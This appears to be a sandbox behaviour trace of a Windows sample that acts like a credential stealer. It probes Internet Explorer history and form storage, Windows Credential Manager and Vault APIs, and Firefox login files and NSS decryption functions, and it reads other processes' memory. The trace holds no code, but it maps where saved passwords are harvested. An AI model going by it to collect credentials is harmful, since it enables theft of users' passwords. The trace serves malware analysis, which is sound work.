| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 384, size_out = 384 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 8, size_out = 8 |
|
7 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 8, size_out = 8 |
|
2 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 384, size_out = 384 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 8, size_out = 8 |
|
27 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat, size = 8, size_out = 8 |
|
26 | |
| File | Create | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017070520170706\index.dat, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017070520170706\index.dat, size = 32, size_out = 32 |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017070520170706\index.dat, type = size |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017070520170706\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017070520170706\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017070520170706\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017070520170706\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017070520170706\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017070520170706\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017070520170706\index.dat, size = 8, size_out = 8 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017070520170706\index.dat, size = 256, size_out = 256 |
|
1 | |
| File | Read | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\History\Low\History.IE5\MSHist012017070520170706\index.dat, size = 8, size_out = 8 |
|
88 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Local\Microsoft\Windows\WebCache\WebCacheV24.dat, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2 |
|
1 | |
| Module | Load | module_name = advapi32.dll, base_address = 0x76030000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CryptAcquireContextA, address_out = 0x760391dd |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CryptReleaseContext, address_out = 0x7603e124 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CryptCreateHash, address_out = 0x7603df4e |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CryptGetHashParam, address_out = 0x7603df7e |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CryptHashData, address_out = 0x7603df36 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CryptDestroyHash, address_out = 0x7603df66 |
|
1 | |
| Module | Load | module_name = advapi32.dll, base_address = 0x76030000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CredReadA, address_out = 0x760771c1 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CredFree, address_out = 0x7603b2ec |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CredDeleteA, address_out = 0x76077941 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CredEnumerateA, address_out = 0x76077381 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = CredEnumerateW, address_out = 0x76077481 |
|
1 | |
| Module | Load | module_name = pstorec.dll, base_address = 0x72810000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\pstorec.dll, function = PStoreCreateInstance, address_out = 0x7281526c |
|
1 | |
| Module | Load | module_name = vaultcli.dll, base_address = 0x723a0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\vaultcli.dll, function = VaultOpenVault, address_out = 0x723a26a9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\vaultcli.dll, function = VaultCloseVault, address_out = 0x723a2718 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\vaultcli.dll, function = VaultEnumerateItems, address_out = 0x723a3099 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\vaultcli.dll, function = VaultFree, address_out = 0x723a4321 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\vaultcli.dll, function = VaultGetInformation, address_out = 0x723a24c0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\vaultcli.dll, function = VaultGetItem, address_out = 0x723a3242 |
|
2 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Roaming\Mozilla\Firefox\Profiles\zcf30c9i.default\history.dat, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Roaming\Mozilla\Firefox\Profiles\zcf30c9i.default\places.sqlite, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\ATVeyDl98Z\AppData\Roaming\Mozilla\Firefox\Profiles\zcf30c9i.default\places.sqlite, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Roaming\Mozilla\Firefox\Profiles\zcf30c9i.default\places.sqlite, type = time |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Roaming\Mozilla\Firefox\profiles.ini, type = file_attributes |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\ATVeyDl98Z\AppData\Roaming\Mozilla\Firefox\profiles.ini, section_name = Profile0, key_name = Path, data_out = Profiles/zcf30c9i.default |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\ATVeyDl98Z\AppData\Roaming\Mozilla\Firefox\profiles.ini, section_name = Profile0, key_name = IsRelative, default_value = 0 |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\ATVeyDl98Z\AppData\Roaming\Mozilla\Firefox\profiles.ini, section_name = Profile1, key_name = Path |
|
1 | |
| Ini | Read | file_name_orig = C:\Users\ATVeyDl98Z\AppData\Roaming\Mozilla\Firefox\profiles.ini, section_name = Profile1, key_name = IsRelative, default_value = 0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\bin |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin, value_name = PathToExe, data = C:\Program Files\Mozilla Firefox\firefox.exe, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Program Files\Mozilla Firefox\nss3.dll, type = file_attributes |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | |
| Module | Get Handle | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, base_address = 0x0 |
|
1 | |
| Module | Load | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, base_address = 0x5f200000 |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = NSS_Init, address_out = 0x5f2bd70b |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = NSS_Shutdown, address_out = 0x5f2bd13c |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = PK11_GetInternalKeySlot, address_out = 0x5f253c51 |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = PK11_FreeSlot, address_out = 0x5f253333 |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = PK11_CheckUserPassword, address_out = 0x5f23cbc4 |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = PK11_Authenticate, address_out = 0x5f23d3ca |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = PK11SDR_Decrypt, address_out = 0x5f2500a7 |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Roaming\Mozilla\Firefox\Profiles\zcf30c9i.default\logins.json, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\ATVeyDl98Z\AppData\Roaming\Mozilla\Firefox\Profiles\zcf30c9i.default\signons.sqlite, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\bin |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin, value_name = PathToExe, data = C:\Program Files\Mozilla Firefox\firefox.exe, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Program Files\Mozilla Firefox\nss3.dll, type = file_attributes |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | |
| File | Get Info | filename = C:\Program Files\Mozilla Firefox\sqlite3.dll, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\Mozilla Firefox\mozsqlite3.dll, type = file_attributes |
|
1 | |
| Module | Get Handle | module_name = c:\program files\mozilla firefox\nss3.dll, base_address = 0x5f200000 |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = sqlite3_open, address_out = 0x5f361ca0 |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = sqlite3_prepare, address_out = 0x5f2ece70 |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = sqlite3_step, address_out = 0x5f355200 |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = sqlite3_column_text, address_out = 0x5f30d400 |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = sqlite3_column_int, address_out = 0x5f30d3a0 |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = sqlite3_column_int64, address_out = 0x5f30d3d0 |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = sqlite3_finalize, address_out = 0x5f339f60 |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = sqlite3_close, address_out = 0x5f33bde0 |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = sqlite3_exec, address_out = 0x5f33a270 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\bin |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox 25.0\bin, value_name = PathToExe, data = C:\Program Files\Mozilla Firefox\firefox.exe, type = REG_SZ |
|
1 | |
| File | Get Info | filename = C:\Program Files\Mozilla Firefox\nss3.dll, type = file_attributes |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla |
|
1 | |
| Module | Get Handle | module_name = c:\program files\mozilla firefox\nss3.dll, base_address = 0x5f200000 |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = NSS_Init, address_out = 0x5f2bd70b |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = NSS_Shutdown, address_out = 0x5f2bd13c |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = PK11_GetInternalKeySlot, address_out = 0x5f253c51 |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = PK11_FreeSlot, address_out = 0x5f253333 |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = PK11_CheckUserPassword, address_out = 0x5f23cbc4 |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = PK11_Authenticate, address_out = 0x5f23d3ca |
|
1 | |
| Module | Get Address | module_name = c:\program files\mozilla firefox\nss3.dll, function = PK11SDR_Decrypt, address_out = 0x5f2500a7 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Load | module_name = psapi.dll, base_address = 0x760d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\psapi.dll, function = GetModuleBaseNameW, address_out = 0x760d152c |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\psapi.dll, function = EnumProcessModules, address_out = 0x760d1408 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\psapi.dll, function = GetModuleFileNameExW, address_out = 0x760d13f0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\psapi.dll, function = EnumProcesses, address_out = 0x760d1544 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\psapi.dll, function = GetModuleInformation, address_out = 0x760d1420 |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\windows\system32\taskhost.exe, file_name_orig = C:\Windows\system32\taskhost.exe, size = 260 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\system32\kernel32.dll, base_address = 0x76350000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = GetProcessTimes, address_out = 0x7638f626 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\windows\system32\dwm.exe, file_name_orig = C:\Windows\system32\Dwm.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\windows\explorer.exe, file_name_orig = C:\Windows\Explorer.EXE, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\windows\system32\taskeng.exe, file_name_orig = C:\Windows\system32\taskeng.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\windows\system32\conhost.exe, file_name_orig = C:\Program Files\Adobe\specifies.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\program files\microsoft.net\gunsmarc.exe, file_name_orig = C:\Program Files\Microsoft.NET\gunsmarc.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\program files\msbuild\improve corporate vital.exe, file_name_orig = C:\Program Files\MSBuild\improve corporate vital.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\program files\adobe\california_hate_gig_hits.exe, file_name_orig = C:\Program Files\Adobe\california_hate_gig_hits.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\windows\system32\sc.exe, file_name_orig = C:\Program Files\Google\streamnomirrorsgrew.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\program files\windows defender\cliff_types.exe, file_name_orig = C:\Program Files\Windows Defender\cliff_types.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\program files\windows journal\shakespeare.exe, file_name_orig = C:\Program Files\Windows Journal\shakespeare.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\program files\microsoft office\collectables_technical.exe, file_name_orig = C:\Program Files\Microsoft Office\collectables_technical.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\program files\windows sidebar\pretty guru.exe, file_name_orig = C:\Program Files\Windows Sidebar\pretty guru.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\program files\msbuild\received_suggestions_stopped_emphasis.exe, file_name_orig = C:\Program Files\MSBuild\received_suggestions_stopped_emphasis.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\program files\windows journal\emerging anniversary muscle cradle.exe, file_name_orig = C:\Program Files\Windows Journal\emerging anniversary muscle cradle.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\program files\windows media player\herbs.exe, file_name_orig = C:\Program Files\Windows Media Player\herbs.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\program files\google\paso_nylon_tests.exe, file_name_orig = C:\Program Files\Google\paso_nylon_tests.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\program files\uninstall information\statewide-emergency.exe, file_name_orig = C:\Program Files\Uninstall Information\statewide-emergency.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\program files\windows sidebar\garageopinionsjoycecincinnati.exe, file_name_orig = C:\Program Files\Windows Sidebar\garageopinionsjoycecincinnati.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\program files\java\ping.exe, file_name_orig = C:\Program Files\Java\ping.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\program files\windows defender\merit.exe, file_name_orig = C:\Program Files\Windows Defender\merit.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\program files\microsoft office\silent_romantic.exe, file_name_orig = C:\Program Files\Microsoft Office\silent_romantic.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\program files\windows portable devices\accredited-reject-transmitted.exe, file_name_orig = C:\Program Files\Windows Portable Devices\accredited-reject-transmitted.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\program files\windows portable devices\project kent essay.exe, file_name_orig = C:\Program Files\Windows Portable Devices\project kent essay.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
| Module | Get Filename | module_name = C:\Program Files\Mozilla Firefox\nss3.dll, process_name = c:\program files\microsoft.net\cuisine-programs.exe, file_name_orig = C:\Program Files\Microsoft.NET\cuisine-programs.exe, size = 260 |
|
1 | |
| Process | Open | desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION |
|
1 | |
